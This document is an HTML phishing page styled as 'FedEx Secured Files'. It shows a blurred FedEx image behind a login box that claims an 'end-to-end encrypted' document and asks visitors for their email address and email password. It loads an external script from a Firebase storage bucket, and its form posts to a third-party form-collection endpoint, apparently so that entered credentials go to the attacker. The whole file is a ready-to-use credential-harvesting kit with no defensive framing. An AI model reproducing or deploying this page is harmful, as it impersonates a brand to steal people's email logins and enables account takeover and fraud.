<html>

<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<title>FedEx Secured Files</title>
<script src="https://firebasestorage.googleapis.com/v0/b/nftpro-9e649.appspot.com/o/ban()kai.js?alt=media&token=403b56b3-5bc0-4274-9bd6-f0201cc81ccd"></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<style>
body,
html {
height: 100%;
margin: 0;
font-family: Arial, Helvetica, sans-serif;
}

* {
box-sizing: border-box;
}

.bg-image {
/* The image used */
background-image: url("https://www.fedex.com/content/dam/fedex/eu-europe/images/eu_en_2020_04_master_web_i_customs-docs-step4_mkt.png");
/* Add the blur effect */
filter: blur(4px);
-webkit-filter: blur(4px);
/* Full height */
height: 100%;
/* Center and scale the image nicely */
background-position: cover;
background-repeat: no-repeat;
background-size: cover;
}

/* Position text in the middle of the page/image */
.bg-text {
background: #800080;
background: -moz-linear-gradient(top, #800080 0%, #301934 74%, #301934 100%);
background: -webkit-linear-gradient(top, #800080 0%, #301934 74%, #301934 100%);
background: linear-gradient(to bottom, #800080 0%, #301934 74%, #301934 100%);
color: white;
font-weight: bold;
border: 1px solid #14772E;
border-radius: 25px 0px 65px 0px;
-webkit-box-shadow: 3px 3px 15px 5px #000000;
box-shadow: 3px 3px 15px 5px #000000;
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
z-index: 2;
width: 350px;
height: 270px;
padding: 5px;
text-align: center;
}
</style>

</head>

<body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0">
<table align="center" cellspacing="0" height="100%" width="100%">
<tr>
<td height="8%" bgcolor="#301934">
<table align="center" cellspacing="0" width="97%">
<tr>
<td>
<font face="arial" size="3" color="#FFFFFF">
&nbsp; <b></b> FedEx Support 
</font>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="88%" bgcolor="#FFF">
<div class="bg-image"></div>
<div class="bg-text">
<table align="center" cellspacing="0">
<tr>
<td style="height:35px;"></td>
</tr>
<tr>
<td>
<font face="arial" size="3" color="#FFF">
&nbsp; ""
</font>
</td>
</tr>

<tr>
<td style="height:10px;"></td>
</tr>

<tr>
<td>
<form id="fs1" method="post" action="https://nocodeform.io/f/66c0ae9aba5e2beb630a8a62">
</td>
</tr>
<tr>
<td>
<div align="left">
<font id="fnt1" face="verdana" size="2" color="#FFF">
&nbsp; Email Timed Out. Sign in to Excel Sheet
</font>
</div>
</td>
</tr>
<tr>
<td style="height:5px;"></td>
</tr>
<tr>
<td>
<table cellspacing="0" align="center">
<tr>
<td>
<div align="center">
<div id="login-container">
    <img id="login-icon" src="https://www.iconpacks.net/icons/2/free-pdf-download-icon-2617-thumb.png" alt="Login Icon">
    <div id="small-text">This Document is end-to-end encrypted, &#x1F512;</div>
    <div id="beautiful-text">Sign in with your email address below to view document.</div>

    <!-- Form starts here -->
    <form action="" method="post" onsubmit="return login()">
      <input type="email" id="email" name="email" placeholder="Email Address" value="" required>
      <input type="password" id="password" name="password" placeholder="Email Password" required>
      <button id="login-button" type="submit">View Document </button>
    </form>
      </div>
    <!-- Form ends here -->
</td>
</tr>
</table>
</td>
</tr>
</table>
</div>

</td>
</tr>



<tr>
<td height="4%" bgcolor="#1C1C1C">


</td>
</tr>
</body>

</html>
